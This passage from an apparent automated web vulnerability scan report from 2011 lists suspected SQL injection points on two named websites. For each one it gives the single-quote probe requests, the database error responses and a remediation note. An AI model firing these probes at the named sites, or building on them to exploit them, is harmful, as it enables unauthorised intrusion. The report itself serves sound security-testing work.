Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.42. http://www.linuxsecurity.com/advisories/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1'; __utmc=137231789; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:05 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=98ef37fcd77bae99f8502f54e9981f07; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.43. http://www.linuxsecurity.com/advisories/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:18 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=6c7734da832a57908a771a3d56456c00; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.44. http://www.linuxsecurity.com/advisories/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789'; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=e7605e0456870a85b25d7c6f67a8ff97; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.45. http://www.linuxsecurity.com/advisories/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23'; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:00 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=5510f9306ce58bbf0156cb7b35502dae; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.46. http://www.linuxsecurity.com/advisories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/?1'=1 HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:06:53 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:06:54 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.47. http://www.slackbooks.com/Athletic+Training [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Athletic+Training

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Athletic+Training' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:56:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10059

<html>
<head>
<title>Unclosed quotation mark before the character string 'athletic+training''.<br>Line 1: Incorrect syntax near 'athletic+training''.</title>
<style>
b
...[SNIP]...

Request 2

GET /Athletic+Training'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:56:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.48. http://www.slackbooks.com/Manual+Therapy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Manual+Therapy

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Manual+Therapy' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10029

<html>
<head>
<title>Unclosed quotation mark before the character string 'manual+therapy''.<br>Line 1: Incorrect syntax near 'manual+therapy''.</title>
<style>
body {f
...[SNIP]...

Request 2

GET /Manual+Therapy'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:59:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.49. http://www.slackbooks.com/Orthotics+and+Prosthetics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Orthotics+and+Prosthetics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Orthotics+and+Prosthetics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:00:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10139

<html>
<head>
<title>Unclosed quotation mark before the character string 'orthotics+and+prosthetics''.<br>Line 1: Incorrect syntax near 'orthotics+and+prosthetics''.</title>
<st
...[SNIP]...

Request 2

GET /Orthotics+and+Prosthetics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.50. http://www.slackbooks.com/Physical+Therapy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Physical+Therapy

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Physical+Therapy' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:02:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10049

<html>
<head>
<title>Unclosed quotation mark before the character string 'physical+therapy''.<br>Line 1: Incorrect syntax near 'physical+therapy''.</title>
<style>
bod
...[SNIP]...

Request 2

GET /Physical+Therapy'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:02:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.51. http://www.slackbooks.com/aclreconstuct [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /aclreconstuct

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aclreconstuct' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:56:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'aclreconstuct''.<br>Line 1: Incorrect syntax near 'aclreconstuct''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /aclreconstuct'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:56:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.52. http://www.slackbooks.com/aclreconstuct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /aclreconstuct

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aclreconstuct?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:56:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /aclreconstuct?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:56:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.53. http://www.slackbooks.com/ccacl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccacl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccacl' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9939

<html>
<head>
<title>Unclosed quotation mark before the character string 'ccacl''.<br>Line 1: Incorrect syntax near 'ccacl''.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /ccacl'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11960


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.54. http://www.slackbooks.com/ccacl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccacl

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccacl?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /ccacl?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
